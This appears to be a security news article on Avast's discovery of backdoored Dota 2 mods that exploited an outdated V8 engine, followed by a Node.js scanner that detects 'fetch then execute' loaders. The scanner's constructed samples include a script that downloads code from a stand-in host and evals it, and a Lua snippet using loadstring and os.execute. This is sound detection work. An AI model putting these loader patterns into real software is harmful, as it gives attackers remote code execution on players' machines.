Avast has warned that its researchers detected four malicious Dota 2 game mods that attackers used to plant backdoors on players' systems.
The researchers say the authors of the malicious mods did not distribute them through themed forums or other channels, but published them directly on Steam, where they could attract players' attention. The mods were named Overdog no annoying heroes (id 2776998052), Custom Hero Brawl (id 2780728794) and Overthrow RTZ Edition X10 XP (id 2780559339). A fourth mod, test addon plz ignore (id 1556548695), carried no real payload; judging by that, the attackers used it only to test their technique.
“Before the mod can be used by regular players, it must be published on the Steam store. The publishing process includes review by Valve. While in theory this helps weed out some malicious mods, no verification process is perfect, and at least four malicious mods have managed to get past it. We believe that the review process is mainly used for moderation to prevent inappropriate content from being posted. There are many ways to hide a backdoor in the code, and it will take a very long time to try to find them all during the verification process,” the experts explain.
The weakness the attackers exploited lies in Panorama, the UI framework Valve developed for Dota 2 itself from the familiar "web triad" of HTML, CSS and JavaScript. Custom game mods ship their own Panorama JavaScript, which the game client executes.
According to the researchers, the JavaScript side is the problem: Dota 2 relied on an outdated build of the V8 engine (its v8.dll was compiled back in December 2018), leaving it exposed to CVE-2021-38003, a vulnerability in V8's JavaScript and WebAssembly engine. That bug was exploited in the wild as a zero-day in 2021 and was patched by the V8 developers in October 2021, and public proof-of-concept exploits for it have been available for a long time.
Malicious JavaScript in the mod used this bug to take control of the player's machine. The exploit was embedded in an otherwise legitimate file that added a scoreboard to the game, which made it harder to spot.
“The backdoor allowed any JavaScript received over HTTP to be executed, giving the attacker the ability to both hide and modify their exploit code at their own discretion (without going through the verification process again), as well as the ability to completely update the entire mod,” says Avast. “Because V8 in Dota was not sandboxed, the exploit allowed remote code execution to be used against players.”
Alongside the backdoor, the attacker embedded a file named evil.lua in the mods, used to test the ability to execute Lua on the server side. The snippet could be used for logging, executing arbitrary commands, creating coroutines and sending HTTP GET requests.
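The backdoor Avast describes has a recognisable shape: a network fetch whose response is handed straight to a dynamic-execution sink (eval on the client, loadstring and os.execute on the Lua server side). The following Node.js script is an added example, not Avast's tooling and not code from the mods or from Valve: a small line-based scanner that flags that "download over HTTP, then execute" chain in mod sources, run over constructed sample files standing in for the scoreboard script and evil.lua. The API names it looks for (Panorama's $.AsyncWebRequest on the client, Dota's CreateHTTPRequest / CreateHTTPRequestScriptVM on the server) are assumptions about what such mods call; the co-occurrence logic itself is generic.

```javascript
'use strict';
// Added example (not Avast's tooling, not the mods' or Valve's code): a
// line-based static scanner for the "fetch over HTTP, then execute" loader
// shape. Pattern names for the Panorama/Dota HTTP helpers are assumptions.

const RULES = {
  js: {
    // network sources (assumed Panorama/browser-style HTTP helpers)
    network: [/\$\.AsyncWebRequest\s*\(/, /\bXMLHttpRequest\b/, /\bfetch\s*\(/],
    // dynamic-execution sinks
    exec: [/\beval\s*\(/, /new\s+Function\s*\(/],
  },
  lua: {
    network: [/\bCreateHTTPRequest(ScriptVM)?\s*\(/],   // assumed Dota server API
    exec: [/\bloadstring\s*\(/, /\bload\s*\(/, /\bdofile\s*\(/],
    shell: [/\bos\.execute\s*\(/, /\bio\.popen\s*\(/],  // arbitrary OS commands
  },
};
const PLAINTEXT_URL = /["'`]http:\/\//;  // payload fetched without TLS (checked on the call line)
const WINDOW = 8;                         // lines to look ahead from a fetch for a sink

// Returns { name, lang, severity, findings } for one source file.
function scanSource(name, lang, source) {
  const rules = RULES[lang];
  if (!rules) throw new Error(`unsupported language: ${lang}`);
  const lines = source.split('\n');
  const findings = [];
  const matchesAny = (patterns, text) => patterns.some((re) => re.test(text));

  lines.forEach((line, i) => {
    // A network call followed within WINDOW lines by an execution sink is the
    // signature of a remote loader rather than an ordinary data fetch.
    if (matchesAny(rules.network, line)) {
      for (let j = i; j < Math.min(lines.length, i + WINDOW); j++) {
        if (matchesAny(rules.exec, lines[j])) {
          findings.push({ kind: 'remote-loader', fetchLine: i + 1, execLine: j + 1,
                          plaintext: PLAINTEXT_URL.test(line) });
          break;
        }
      }
    }
    if (rules.shell && matchesAny(rules.shell, line)) {
      findings.push({ kind: 'shell-exec', line: i + 1 });
    }
  });

  // Shell execution or a plaintext-HTTP loader is the worst case; a loader
  // over HTTPS still deserves a look; nothing found means no loader shape.
  const severity = findings.some((f) => f.kind === 'shell-exec' || f.plaintext) ? 'high'
                 : findings.length ? 'medium' : 'none';
  return { name, lang, severity, findings };
}

// Constructed samples, not the real mod files.
const BENIGN_SCOREBOARD_JS = `
var scoreboard = $("#Scoreboard");
$.AsyncWebRequest("https://example.invalid/scores.json", {
  type: "GET",
  success: function (data) {
    var rows = JSON.parse(data);      // treated as data, never executed
    scoreboard.SetText(rows.length + " players");
  }
});
`;

const BACKDOORED_SCOREBOARD_JS = `
var scoreboard = $("#Scoreboard");
$.AsyncWebRequest("http://example.invalid/stage2.js", {
  type: "GET",
  success: function (data) {
    eval(data);                       // whatever the server returns runs in-game
  }
});
`;

const EVIL_LUA = `
local req = CreateHTTPRequest("GET", "http://example.invalid/cmd")
req:Send(function (result)
  local fn = loadstring(result.Body)
  if fn then fn() end
end)
os.execute("echo pwned")
`;

function scanSamples() {
  return [
    scanSource('scoreboard.js', 'js', BENIGN_SCOREBOARD_JS),
    scanSource('scoreboard_backdoored.js', 'js', BACKDOORED_SCOREBOARD_JS),
    scanSource('evil.lua', 'lua', EVIL_LUA),
  ];
}

for (const r of scanSamples()) {
  console.log(`${r.name}: ${r.severity}`, JSON.stringify(r.findings));
}
```

The benign scoreboard fetches JSON and parses it, so it produces no finding; the backdoored copy is flagged as a plaintext-HTTP remote loader (fetch on line 3, eval on line 6), and the Lua sample trips both the loader rule and the shell-execution rule. A pattern co-occurrence check like this is cheap enough to run over every file in a submitted mod, and it is exactly the kind of check that a review focused on inappropriate content, as the Avast researchers describe, would not perform.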
Avast reported its findings to Valve, which updated the vulnerable V8 build on January 12, 2023. Valve also removed the malicious mods from Steam and notified all players affected by the attack.